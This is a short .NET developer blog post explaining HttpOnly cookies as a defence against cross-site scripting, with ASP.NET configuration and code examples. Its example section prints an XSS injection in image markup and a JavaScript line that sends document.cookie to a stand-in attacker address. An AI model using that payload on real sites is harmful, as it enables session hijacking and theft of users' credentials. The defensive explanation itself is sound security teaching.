.NET Daily

Passive Security Tip: HttpOnly Cookies

Introduction

During a Cross-site Scripting attack, an attacker can easily read the victim's cookies from client-side script and use them to hijack the victim's session.

Example

A user opens an email containing a newsletter. The image markup below causes the browser to load and execute a malicious JavaScript file on the client; the script itself is shown after the HTML code.

HTML Code:

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><img 
src="http://www.a.com/a.jpg</script>"/>

Javascript Code:

window.location="http://1.2.3.4:81/r.php?u="
+document.links[1].text
+"&l="+document.links[1]
+"&c="+document.cookie;

Remedy

Cookies should be marked as HttpOnly. HttpOnly cookies cannot be read by client-side scripts (they are not exposed through document.cookie), so marking a cookie as HttpOnly provides an additional layer of protection against Cross-site Scripting attacks. Note that the flag protects only the cookie value: it does not stop the injected script from running, so it complements output encoding rather than replacing it.

Below you can find some implementation examples:

If you use the default ASP.NET Membership provider, you can mark the cookies from web.config:

<system.web>
    <compilation debug="true" targetFramework="4.0" />
    <httpCookies httpOnlyCookies="true" requireSSL="true" />
</system.web>

If you create cookies from code, you can use the following property of the cookie object:

    using System.Web;

    static HttpCookie CreateCookie(string id)
    {
        // Config.CookieName is the application's own cookie name setting
        HttpCookie cookie = new HttpCookie(Config.CookieName, id);
        cookie.Path = "/";
        cookie.HttpOnly = true;   // not readable from document.cookie
        return cookie;
    }
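The two settings above cover cookies issued by the framework and cookies you create yourself, but a cookie added by a third-party library or an older code path can still be emitted without the flag. The following Global.asax handler is an added example (not code from the original post) that applies HttpOnly to every cookie in the outgoing response at the end of each request, and Secure when the request arrived over TLS, matching requireSSL="true" above. It assumes classic ASP.NET (System.Web); the class and handler names follow the usual Global.asax conventions.

```csharp
// Added example: enforce HttpOnly (and Secure on HTTPS) on every cookie
// the application emits, regardless of which code path created it.
// Assumes classic ASP.NET (System.Web) with response buffering enabled,
// so Set-Cookie headers are generated after Application_EndRequest runs.
using System;
using System.Web;

public class Global : HttpApplication
{
    // Fires once per request after handlers and modules have finished
    // writing to the response, but before headers are sent to the client.
    protected void Application_EndRequest(object sender, EventArgs e)
    {
        HttpContext context = HttpContext.Current;
        if (context == null || context.Response == null)
        {
            return;
        }

        HttpResponse response = context.Response;

        // Iterate by key: Response.Cookies is an HttpCookieCollection.
        foreach (string name in response.Cookies.AllKeys)
        {
            HttpCookie cookie = response.Cookies[name];
            if (cookie == null)
            {
                continue;
            }

            // Deny client-side script access to the cookie value.
            cookie.HttpOnly = true;

            // Only mark Secure when the request itself used TLS; otherwise
            // the browser would drop the cookie on plain HTTP development hosts.
            if (context.Request.IsSecureConnection)
            {
                cookie.Secure = true;
            }
        }
    }
}
```

Deploy this alongside the web.config setting rather than instead of it: the config flag covers the common case cheaply, while the handler acts as a safety net you can verify by inspecting the Set-Cookie headers in the browser's developer tools after a login.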

Darius

Darius Dumitrescu is a creative Senior CMS Consultant with in depth .NET knowledge, focused on Web Development and Architecture Design.

Comments

Water Quality Service and Testing Lakewood (posted 6:34 am June 14, 2018):

    Link exchange is nothing else except it is simply placing the other person's weblog link on your page at a suitable place, and the other person will also do the same for you.
